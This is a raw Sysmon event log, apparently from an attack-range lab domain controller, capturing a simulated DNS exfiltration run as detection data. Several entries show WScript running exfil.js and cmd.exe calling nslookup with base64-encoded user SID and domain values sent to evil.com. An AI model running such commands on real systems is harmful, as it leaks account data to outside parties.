84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.063{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.063{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.063{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-0F42-000000005F02}2040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.063{2E1864BB-17A1-629A-783D-000000005F02}55527988C:\Windows\System32\WScript.exe{2E1864BB-17CE-629A-0F42-000000005F02}2040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.068{2E1864BB-17CE-629A-0F42-000000005F02}2040C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlltuinv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.063{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhrtfzy.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.041{2E1864BB-17CE-629A-0D42-000000005F02}57406856C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-0E42-000000005F02}7836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.041{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.041{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.041{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.041{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.025{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-0E42-000000005F02}7836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.025{2E1864BB-17CE-629A-0C42-000000005F02}74128000C:\Windows\system32\cmd.exe{2E1864BB-17CE-629A-0E42-000000005F02}7836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.040{2E1864BB-17CE-629A-0E42-000000005F02}7836C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CE-629A-0C42-000000005F02}7412C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhrtfzy.tmp 2>&1 10341000x8000000000000000204415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.010{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-0D42-000000005F02}5740C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.010{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-0D42-000000005F02}5740C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.010{2E1864BB-17CE-629A-0D42-000000005F02}57406856C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-0C42-000000005F02}7412C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.994{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-0D42-000000005F02}5740C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.994{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.994{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.994{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.994{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.994{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-0C42-000000005F02}7412C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.994{2E1864BB-17A1-629A-783D-000000005F02}55525084C:\Windows\System32\WScript.exe{2E1864BB-17CE-629A-0C42-000000005F02}7412C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.001{2E1864BB-17CE-629A-0C42-000000005F02}7412C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhrtfzy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000205005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.458{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53162- 354300x8000000000000000205004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.458{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53161- 354300x8000000000000000205003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.458{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53161- 354300x8000000000000000205002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.457{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53160- 354300x8000000000000000205001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.457{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53160- 354300x8000000000000000205000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.378{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53159- 354300x8000000000000000204999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.377{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53159- 354300x8000000000000000204998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.377{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53158- 354300x8000000000000000204997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.377{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53158- 354300x8000000000000000204996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.377{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53157- 354300x8000000000000000204995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.377{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53157- 22542200x8000000000000000204994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.635{00000000-0000-0000-0000-000000000000}5960evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.557{00000000-0000-0000-0000-000000000000}5516evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.456{00000000-0000-0000-0000-000000000000}1648evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.379{00000000-0000-0000-0000-000000000000}2192evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.266{00000000-0000-0000-0000-000000000000}7084evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.171{00000000-0000-0000-0000-000000000000}4348evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.083{00000000-0000-0000-0000-000000000000}652evil.com0::ffff:127.0.0.1;<unknown process> 23542300x8000000000000000204987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.826{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=5BBBA8CA13FD6B3DD33B3CE09699B9A6,SHA256=FF566842560A9256BDBD9A7D49112E6A85E276FBACFC1427FA83F94DA23360B5,IMPHASH=00000000000000000000000000000000falsetrue 